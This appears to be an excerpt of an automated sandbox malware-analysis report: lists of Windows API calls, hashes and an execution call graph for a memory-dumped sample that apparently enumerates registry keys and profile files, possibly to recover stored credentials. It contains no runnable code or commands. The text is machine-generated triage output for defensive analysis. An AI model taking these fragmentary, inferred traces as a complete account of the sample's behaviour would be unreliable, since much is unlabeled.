                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                      APIs
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                      • wcscat.MSVCRT ref: 0040DCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileModuleNamewcscatwcsrchr
                                      • String ID: _lng.ini
                                      • API String ID: 383090722-1948609170
                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                      • API String ID: 2773794195-880857682
                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                      APIs
                                      • memcmp.MSVCRT ref: 00408AF3
                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                      • memcmp.MSVCRT ref: 00408B2B
                                      • memcmp.MSVCRT ref: 00408B5C
                                      • memcpy.MSVCRT ref: 00408B79
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID:
                                      • API String ID: 231171946-0
                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcslen$wcscat$wcscpy
                                      • String ID:
                                      • API String ID: 1961120804-0
                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                      Execution Graph

                                      Execution Coverage:2.4%
                                      Dynamic/Decrypted Code Coverage:20.3%
                                      Signature Coverage:0.5%
                                      Total number of Nodes:848
                                      Total number of Limit Nodes:16
                                      execution_graph 34120 40fc40 70 API calls 34294 403640 21 API calls 34121 427fa4 42 API calls 34295 412e43 _endthreadex 34296 425115 76 API calls __fprintf_l 34297 43fe40 133 API calls 34124 425115 83 API calls __fprintf_l 34125 401445 memcpy memcpy DialogBoxParamA 34126 440c40 34 API calls 33252 444c4a 33271 444e38 33252->33271 33254 444c56 GetModuleHandleA 33255 444c68 __set_app_type __p__fmode __p__commode 33254->33255 33257 444cfa 33255->33257 33258 444d02 __setusermatherr 33257->33258 33259 444d0e 33257->33259 33258->33259 33272 444e22 _controlfp 33259->33272 33261 444d13 _initterm __getmainargs _initterm 33262 444d6a GetStartupInfoA 33261->33262 33264 444d9e GetModuleHandleA 33262->33264 33273 40cf44 33264->33273 33268 444dcf _cexit 33270 444e04 33268->33270 33269 444dc8 exit 33269->33268 33271->33254 33272->33261 33324 404a99 LoadLibraryA 33273->33324 33275 40cf64 33275->33268 33275->33269 33276 40cf60 33276->33275 33331 410d0e 33276->33331 33278 40cf6f 33335 40ccd7 ??2@YAPAXI 33278->33335 33280 40cf9b 33349 407cbc 33280->33349 33285 40cfc4 33367 409825 memset 33285->33367 33286 40cfd8 33372 4096f4 memset 33286->33372 33291 407e30 _strcmpi 33293 40cfee 33291->33293 33292 40d181 ??3@YAXPAX 33294 40d1b3 33292->33294 33295 40d19f DeleteObject 33292->33295 33297 40cff2 RegDeleteKeyA 33293->33297 33298 40d007 EnumResourceTypesA 33293->33298 33396 407948 ??3@YAXPAX ??3@YAXPAX 33294->33396 33295->33294 33297->33292 33300 40d047 33298->33300 33301 40d02f MessageBoxA 33298->33301 33299 40d1c4 33397 4080d4 ??3@YAXPAX 33299->33397 33303 40d0a0 CoInitialize 33300->33303 33377 40ce70 33300->33377 33301->33292 33394 40cc26 strncat memset RegisterClassA CreateWindowExA 33303->33394 33304 40d1cd 33398 407948 ??3@YAXPAX ??3@YAXPAX 33304->33398 33309 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33395 40c256 PostMessageA 33309->33395 33311 40d061 ??3@YAXPAX 33311->33294 33314 40d084 DeleteObject 33311->33314 33312 40d09e 33312->33303 33314->33294 33316 40d0f9 GetMessageA 33317 40d17b 33316->33317 33318 40d10d 33316->33318 33317->33292 33319 40d113 TranslateAccelerator 33318->33319 33321 40d145 IsDialogMessage 33318->33321 33322 40d139 IsDialogMessage 33318->33322 33319->33318 33320 40d16d GetMessageA 33319->33320 33320->33317 33320->33319 33321->33320 33323 40d157 TranslateMessage DispatchMessageA 33321->33323 33322->33320 33322->33321 33323->33320 33325 404ac4 GetProcAddress 33324->33325 33327 404ae8 33324->33327 33326 404add FreeLibrary 33325->33326 33328 404ad4 33325->33328 33326->33327 33329 404b13 33327->33329 33330 404afc MessageBoxA 33327->33330 33328->33326 33329->33276 33330->33276 33332 410d17 LoadLibraryA 33331->33332 33333 410d3c 33331->33333 33332->33333 33334 410d2b GetProcAddress 33332->33334 33333->33278 33334->33333 33336 40cd08 ??2@YAPAXI 33335->33336 33338 40cd26 33336->33338 33340 40cd2d 33336->33340 33406 404025 6 API calls 33338->33406 33341 40cd66 33340->33341 33342 40cd59 DeleteObject 33340->33342 33399 407088 33341->33399 33342->33341 33344 40cd6b 33402 4019b5 33344->33402 33347 4019b5 strncat 33348 40cdbf _mbscpy 33347->33348 33348->33280 33408 407948 ??3@YAXPAX ??3@YAXPAX 33349->33408 33353 407ddc 33362 407e04 33353->33362 33421 407a1f 33353->33421 33354 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33360 407cf7 33354->33360 33356 407d7a ??3@YAXPAX 33356->33360 33360->33353 33360->33354 33360->33356 33360->33362 33412 40796e 7 API calls 33360->33412 33413 406f30 33360->33413 33409 407a55 33362->33409 33363 407e30 33364 407e57 33363->33364 33366 407e38 33363->33366 33364->33285 33364->33286 33365 407e41 _strcmpi 33365->33364 33365->33366 33366->33364 33366->33365 33427 4097ff 33367->33427 33369 409854 33432 409731 33369->33432 33373 4097ff 3 API calls 33372->33373 33374 409723 33373->33374 33452 40966c 33374->33452 33466 4023b2 33377->33466 33383 40ced3 33555 40cdda 7 API calls 33383->33555 33384 40cece 33387 40cf3f 33384->33387 33507 40c3d0 memset GetModuleFileNameA strrchr 33384->33507 33387->33311 33387->33312 33390 40ceed 33534 40affa 33390->33534 33394->33309 33395->33316 33396->33299 33397->33304 33398->33275 33407 406fc7 memset _mbscpy 33399->33407 33401 40709f CreateFontIndirectA 33401->33344 33403 4019e1 33402->33403 33404 4019c2 strncat 33403->33404 33405 4019e5 memset LoadIconA 33403->33405 33404->33403 33405->33347 33406->33340 33407->33401 33408->33360 33410 407a65 33409->33410 33411 407a5b ??3@YAXPAX 33409->33411 33410->33363 33411->33410 33412->33360 33414 406f37 malloc 33413->33414 33415 406f7d 33413->33415 33417 406f73 33414->33417 33418 406f58 33414->33418 33415->33360 33417->33360 33419 406f6c ??3@YAXPAX 33418->33419 33420 406f5c memcpy 33418->33420 33419->33417 33420->33419 33422 407a38 33421->33422 33423 407a2d ??3@YAXPAX 33421->33423 33425 406f30 3 API calls 33422->33425 33424 407a43 33423->33424 33426 40796e 7 API calls 33424->33426 33425->33424 33426->33362 33443 406f96 GetModuleFileNameA 33427->33443 33429 409805 strrchr 33430 409814 33429->33430 33431 409817 _mbscat 33429->33431 33430->33431 33431->33369 33444 44b090 33432->33444 33437 40930c 3 API calls 33438 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33437->33438 33439 4097c5 LoadStringA 33438->33439 33442 4097db 33439->33442 33441 4097f3 33441->33292 33442->33439 33442->33441 33451 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33442->33451 33443->33429 33445 40973e _mbscpy _mbscpy 33444->33445 33446 40930c 33445->33446 33447 44b090 33446->33447 33448 409319 memset GetPrivateProfileStringA 33447->33448 33449 409374 33448->33449 33450 409364 WritePrivateProfileStringA 33448->33450 33449->33437 33450->33449 33451->33442 33462 406f81 GetFileAttributesA 33452->33462 33454 409675 33455 4096ee 33454->33455 33456 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33454->33456 33455->33291 33463 409278 GetPrivateProfileStringA 33456->33463 33458 4096c9 33464 409278 GetPrivateProfileStringA 33458->33464 33460 4096da 33465 409278 GetPrivateProfileStringA 33460->33465 33462->33454 33463->33458 33464->33460 33465->33455 33557 409c1c 33466->33557 33469 401e69 memset 33596 410dbb 33469->33596 33472 401ec2 33626 4070e3 strlen _mbscat _mbscpy _mbscat 33472->33626 33473 401ed4 33611 406f81 GetFileAttributesA 33473->33611 33476 401ee6 strlen strlen 33478 401f15 33476->33478 33479 401f28 33476->33479 33627 4070e3 strlen _mbscat _mbscpy _mbscat 33478->33627 33612 406f81 GetFileAttributesA 33479->33612 33482 401f35 33613 401c31 33482->33613 33485 401f75 33625 410a9c RegOpenKeyExA 33485->33625 33486 401c31 7 API calls 33486->33485 33488 401f91 33489 402187 33488->33489 33490 401f9c memset 33488->33490 33492 402195 ExpandEnvironmentStringsA 33489->33492 33493 4021a8 _strcmpi 33489->33493 33628 410b62 RegEnumKeyExA 33490->33628 33637 406f81 GetFileAttributesA 33492->33637 33493->33383 33493->33384 33495 40217e RegCloseKey 33495->33489 33496 401fd9 atoi 33497 401fef memset memset sprintf 33496->33497 33504 401fc9 33496->33504 33629 410b1e 33497->33629 33500 402165 33500->33495 33501 402076 memset memset strlen strlen 33501->33504 33502 4070e3 strlen _mbscat _mbscpy _mbscat 33502->33504 33503 4020dd strlen strlen 33503->33504 33504->33495 33504->33496 33504->33500 33504->33501 33504->33502 33504->33503 33505 406f81 GetFileAttributesA 33504->33505 33506 402167 _mbscpy 33504->33506 33636 410b62 RegEnumKeyExA 33504->33636 33505->33504 33506->33495 33508 40c422 33507->33508 33509 40c425 _mbscat _mbscpy _mbscpy 33507->33509 33508->33509 33510 40c49d 33509->33510 33511 40c512 33510->33511 33512 40c502 GetWindowPlacement 33510->33512 33513 40c538 33511->33513 33658 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33511->33658 33512->33511 33651 409b31 33513->33651 33517 40ba28 33518 40ba87 33517->33518 33522 40ba3c 33517->33522 33661 406c62 LoadCursorA SetCursor 33518->33661 33520 40ba8c 33662 4107f1 33520->33662 33665 410a9c RegOpenKeyExA 33520->33665 33666 404734 33520->33666 33674 404785 33520->33674 33677 403c16 33520->33677 33521 40ba43 _mbsicmp 33521->33522 33522->33518 33522->33521 33753 40b5e5 10 API calls 33522->33753 33523 40baa0 33524 407e30 _strcmpi 33523->33524 33527 40bab0 33524->33527 33525 40bafa SetCursor 33525->33390 33527->33525 33528 40baf1 qsort 33527->33528 33528->33525 34113 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33534->34113 33536 40b00e 33537 40b016 33536->33537 33538 40b01f GetStdHandle 33536->33538 34114 406d1a CreateFileA 33537->34114 33540 40b01c 33538->33540 33541 40b035 33540->33541 33542 40b12d 33540->33542 34115 406c62 LoadCursorA SetCursor 33541->34115 34119 406d77 9 API calls 33542->34119 33545 40b136 33556 40c580 28 API calls 33545->33556 33546 40b042 33547 40b087 33546->33547 33553 40b0a1 33546->33553 34116 40a57c strlen WriteFile 33546->34116 33547->33553 34117 40a699 12 API calls 33547->34117 33550 40b0d6 33551 40b116 CloseHandle 33550->33551 33552 40b11f SetCursor 33550->33552 33551->33552 33552->33545 33553->33550 34118 406d77 9 API calls 33553->34118 33555->33384 33556->33387 33569 409a32 33557->33569 33560 409c80 memcpy memcpy 33561 409cda 33560->33561 33561->33560 33562 408db6 12 API calls 33561->33562 33563 409d18 ??2@YAPAXI ??2@YAPAXI 33561->33563 33562->33561 33564 409d54 ??2@YAPAXI 33563->33564 33565 409d8b 33563->33565 33564->33565 33579 409b9c 33565->33579 33568 4023c1 33568->33469 33570 409a44 33569->33570 33571 409a3d ??3@YAXPAX 33569->33571 33572 409a52 33570->33572 33573 409a4b ??3@YAXPAX 33570->33573 33571->33570 33574 409a5c ??3@YAXPAX 33572->33574 33576 409a63 33572->33576 33573->33572 33574->33576 33575 409a83 ??2@YAPAXI ??2@YAPAXI 33575->33560 33576->33575 33577 409a73 ??3@YAXPAX 33576->33577 33578 409a7c ??3@YAXPAX 33576->33578 33577->33578 33578->33575 33580 407a55 ??3@YAXPAX 33579->33580 33581 409ba5 33580->33581 33582 407a55 ??3@YAXPAX 33581->33582 33583 409bad 33582->33583 33584 407a55 ??3@YAXPAX 33583->33584 33585 409bb5 33584->33585 33586 407a55 ??3@YAXPAX 33585->33586 33587 409bbd 33586->33587 33588 407a1f 4 API calls 33587->33588 33589 409bd0 33588->33589 33590 407a1f 4 API calls 33589->33590 33591 409bda 33590->33591 33592 407a1f 4 API calls 33591->33592 33593 409be4 33592->33593 33594 407a1f 4 API calls 33593->33594 33595 409bee 33594->33595 33595->33568 33597 410d0e 2 API calls 33596->33597 33598 410dca 33597->33598 33599 410dfd memset 33598->33599 33638 4070ae 33598->33638 33600 410e1d 33599->33600 33641 410a9c RegOpenKeyExA 33600->33641 33604 410e4a 33605 410e7f _mbscpy 33604->33605 33642 410d3d _mbscpy 33604->33642 33606 401e9e strlen strlen 33605->33606 33606->33472 33606->33473 33608 410e5b 33643 410add RegQueryValueExA 33608->33643 33610 410e73 RegCloseKey 33610->33605 33611->33476 33612->33482 33644 410a9c RegOpenKeyExA 33613->33644 33615 401c4c 33616 401cad 33615->33616 33645 410add RegQueryValueExA 33615->33645 33616->33485 33616->33486 33618 401c6a 33619 401c71 strchr 33618->33619 33620 401ca4 RegCloseKey 33618->33620 33619->33620 33621 401c85 strchr 33619->33621 33620->33616 33621->33620 33622 401c94 33621->33622 33646 406f06 strlen 33622->33646 33624 401ca1 33624->33620 33625->33488 33626->33473 33627->33479 33628->33504 33649 410a9c RegOpenKeyExA 33629->33649 33631 410b34 33632 410b5d 33631->33632 33650 410add RegQueryValueExA 33631->33650 33632->33504 33634 410b4c RegCloseKey 33634->33632 33636->33504 33637->33493 33639 4070bd GetVersionExA 33638->33639 33640 4070ce 33638->33640 33639->33640 33640->33599 33640->33606 33641->33604 33642->33608 33643->33610 33644->33615 33645->33618 33647 406f17 33646->33647 33648 406f1a memcpy 33646->33648 33647->33648 33648->33624 33649->33631 33650->33634 33652 409b40 33651->33652 33654 409b4e 33651->33654 33659 409901 memset SendMessageA 33652->33659 33655 409b99 33654->33655 33656 409b8b 33654->33656 33655->33517 33660 409868 SendMessageA 33656->33660 33658->33513 33659->33654 33660->33655 33661->33520 33663 410807 33662->33663 33664 4107fc FreeLibrary 33662->33664 33663->33523 33664->33663 33665->33523 33667 404785 FreeLibrary 33666->33667 33668 40473b LoadLibraryA 33667->33668 33669 40474c GetProcAddress 33668->33669 33672 40476e 33668->33672 33670 404764 33669->33670 33669->33672 33670->33672 33671 404781 33671->33523 33672->33671 33673 404785 FreeLibrary 33672->33673 33673->33671 33675 4047a3 33674->33675 33676 404799 FreeLibrary 33674->33676 33675->33523 33676->33675 33678 4107f1 FreeLibrary 33677->33678 33679 403c30 LoadLibraryA 33678->33679 33680 403c74 33679->33680 33681 403c44 GetProcAddress 33679->33681 33683 4107f1 FreeLibrary 33680->33683 33681->33680 33682 403c5e 33681->33682 33682->33680 33687 403c6b 33682->33687 33684 403c7b 33683->33684 33685 404734 3 API calls 33684->33685 33686 403c86 33685->33686 33754 4036e5 33686->33754 33687->33684 33690 4036e5 23 API calls 33691 403c9a 33690->33691 33692 4036e5 23 API calls 33691->33692 33693 403ca4 33692->33693 33694 4036e5 23 API calls 33693->33694 33695 403cae 33694->33695 33764 4085d2 33695->33764 33703 403cf7 33810 410a9c RegOpenKeyExA 33703->33810 33704 403ce5 33704->33703 33945 402bd1 39 API calls 33704->33945 33707 403d0a 33708 403d1c 33707->33708 33946 402bd1 39 API calls 33707->33946 33811 402c5d 33708->33811 33712 4070ae GetVersionExA 33713 403d31 33712->33713 33829 410a9c RegOpenKeyExA 33713->33829 33715 403d51 33716 403d61 33715->33716 33947 402b22 46 API calls 33715->33947 33830 410a9c RegOpenKeyExA 33716->33830 33719 403d87 33720 403d97 33719->33720 33948 402b22 46 API calls 33719->33948 33831 410a9c RegOpenKeyExA 33720->33831 33723 403dbd 33724 403dcd 33723->33724 33949 402b22 46 API calls 33723->33949 33832 410808 33724->33832 33728 404785 FreeLibrary 33729 403de8 33728->33729 33836 402fdb 33729->33836 33732 402fdb 34 API calls 33733 403e00 33732->33733 33852 4032b7 33733->33852 33742 403e3b 33744 403e73 33742->33744 33745 403e46 _mbscpy 33742->33745 33899 40fb00 33744->33899 33951 40f334 334 API calls 33745->33951 33753->33522 33755 4037c5 33754->33755 33756 4036fb 33754->33756 33755->33690 33756->33755 33757 403716 strchr 33756->33757 33757->33755 33758 403730 33757->33758 33952 4021b6 memset 33758->33952 33760 40373f _mbscpy _mbscpy strlen 33761 4037a4 _mbscpy 33760->33761 33762 403789 sprintf 33760->33762 33953 4023e5 16 API calls 33761->33953 33762->33761 33765 4085e2 33764->33765 33954 4082cd 11 API calls 33765->33954 33769 408600 33770 403cba 33769->33770 33771 40860b memset 33769->33771 33782 40821d 33770->33782 33957 410b62 RegEnumKeyExA 33771->33957 33773 4086d2 RegCloseKey 33773->33770 33775 408637 33775->33773 33776 40865c memset 33775->33776 33958 410a9c RegOpenKeyExA 33775->33958 33961 410b62 RegEnumKeyExA 33775->33961 33959 410add RegQueryValueExA 33776->33959 33779 408694 33960 40848b 10 API calls 33779->33960 33781 4086ab RegCloseKey 33781->33775 33962 410a9c RegOpenKeyExA 33782->33962 33784 40823f 33785 403cc6 33784->33785 33786 408246 memset 33784->33786 33794 4086e0 33785->33794 33963 410b62 RegEnumKeyExA 33786->33963 33788 4082bf RegCloseKey 33788->33785 33790 40826f 33790->33788 33964 410a9c RegOpenKeyExA 33790->33964 33965 4080ed 11 API calls 33790->33965 33966 410b62 RegEnumKeyExA 33790->33966 33793 4082a2 RegCloseKey 33793->33790 33967 4045db 33794->33967 33796 4088ef 33975 404656 33796->33975 33800 408737 wcslen 33800->33796 33806 40876a 33800->33806 33801 40877a _wcsncoll 33801->33806 33803 404734 3 API calls 33803->33806 33804 404785 FreeLibrary 33804->33806 33805 408812 memset 33805->33806 33807 40883c memcpy wcschr 33805->33807 33806->33796 33806->33801 33806->33803 33806->33804 33806->33805 33806->33807 33808 4088c3 LocalFree 33806->33808 33978 40466b _mbscpy 33806->33978 33807->33806 33808->33806 33809 410a9c RegOpenKeyExA 33809->33704 33810->33707 33979 410a9c RegOpenKeyExA 33811->33979 33813 402c7a 33814 402da5 33813->33814 33815 402c87 memset 33813->33815 33814->33712 33980 410b62 RegEnumKeyExA 33815->33980 33817 402d9c RegCloseKey 33817->33814 33818 410b1e 3 API calls 33819 402ce4 memset sprintf 33818->33819 33981 410a9c RegOpenKeyExA 33819->33981 33821 402d28 33822 402d3a sprintf 33821->33822 33982 402bd1 39 API calls 33821->33982 33983 410a9c RegOpenKeyExA 33822->33983 33827 402cb2 33827->33817 33827->33818 33828 402d9a 33827->33828 33984 402bd1 39 API calls 33827->33984 33985 410b62 RegEnumKeyExA 33827->33985 33828->33817 33829->33715 33830->33719 33831->33723 33833 410816 33832->33833 33834 4107f1 FreeLibrary 33833->33834 33835 403ddd 33834->33835 33835->33728 33986 410a9c RegOpenKeyExA 33836->33986 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 33987 410b62 RegEnumKeyExA 33839->33987 33840->33732 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 33988 410a9c RegOpenKeyExA 33844->33988 33846 4030a2 memset 33989 410b62 RegEnumKeyExA 33846->33989 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 33990 402db3 26 API calls 33851->33990 33853 4032d5 33852->33853 33854 4033a9 33852->33854 33991 4021b6 memset 33853->33991 33867 4034e4 memset memset 33854->33867 33856 4032e1 33992 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->33992 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 33993 4023e5 16 API calls 33858->33993 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 33994 4021b6 memset 33864->33994 33995 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->33995 33996 4023e5 16 API calls 33864->33996 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 33997 406d55 strlen _mbscat 33871->33997 33873 403565 _mbscat 33998 4033f0 19 API calls 33873->33998 33999 40466b _mbscpy 33875->33999 33879 4039aa 33880 4039ff 33879->33880 34000 40f460 memset memset 33879->34000 34021 40f6e2 33879->34021 34039 4038e8 21 API calls 33879->34039 33882 404785 FreeLibrary 33880->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34047 444551 memset 33884->34047 33887 4038e2 33887->33742 33950 40f334 334 API calls 33887->33950 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34059 4023e5 16 API calls 33896->34059 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34064 40f802 11 API calls 33911->34064 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33917 40f9a9 33916->33917 33918 40fae6 33917->33918 33921 40fa13 memset WideCharToMultiByte 33917->33921 33919 404656 FreeLibrary 33918->33919 33920 403e85 33919->33920 33925 4442ea memset 33920->33925 33921->33917 33922 40fa43 _strnicmp 33921->33922 33922->33917 33923 40fa5b WideCharToMultiByte 33922->33923 33923->33917 33924 40fa88 WideCharToMultiByte 33923->33924 33924->33917 33926 410dbb 9 API calls 33925->33926 33927 444329 33926->33927 34065 40759e strlen strlen 33927->34065 33932 410dbb 9 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33523 33944 444212 65 API calls 33943->33944 33944->33942 33945->33703 33946->33708 33947->33716 33948->33720 33949->33724 33950->33742 33951->33744 33952->33760 33953->33755 33955 40841c 33954->33955 33956 410a9c RegOpenKeyExA 33955->33956 33956->33769 33957->33775 33958->33775 33959->33779 33960->33781 33961->33775 33962->33784 33963->33790 33964->33790 33965->33793 33966->33790 33968 404656 FreeLibrary 33967->33968 33969 4045e3 LoadLibraryA 33968->33969 33970 404651 33969->33970 33971 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33969->33971 33970->33796 33970->33800 33972 40463d 33971->33972 33973 404643 33972->33973 33974 404656 FreeLibrary 33972->33974 33973->33970 33974->33970 33976 403cd2 33975->33976 33977 40465c FreeLibrary 33975->33977 33976->33809 33977->33976 33978->33806 33979->33813 33980->33827 33981->33821 33982->33822 33983->33827 33984->33827 33985->33827 33986->33838 33987->33851 33988->33851 33989->33851 33990->33851 33991->33856 33992->33858 33993->33859 33994->33863 33995->33864 33996->33864 33997->33873 33998->33870 33999->33879 34040 4078ba 34000->34040 34003 4078ba _mbsnbcat 34004 40f5a3 RegOpenKeyExA 34003->34004 34005 40f5c3 RegQueryValueExA 34004->34005 34006 40f6d9 34004->34006 34007 40f6d0 RegCloseKey 34005->34007 34008 40f5f0 34005->34008 34006->33879 34007->34006 34008->34007 34009 40f675 34008->34009 34044 40466b _mbscpy 34008->34044 34009->34007 34045 4012ee strlen 34009->34045 34011 40f611 34013 404734 3 API calls 34011->34013 34018 40f616 34013->34018 34014 40f69e RegQueryValueExA 34014->34007 34015 40f6c1 34014->34015 34015->34007 34016 40f66a 34017 404785 FreeLibrary 34016->34017 34017->34009 34018->34016 34019 40f661 LocalFree 34018->34019 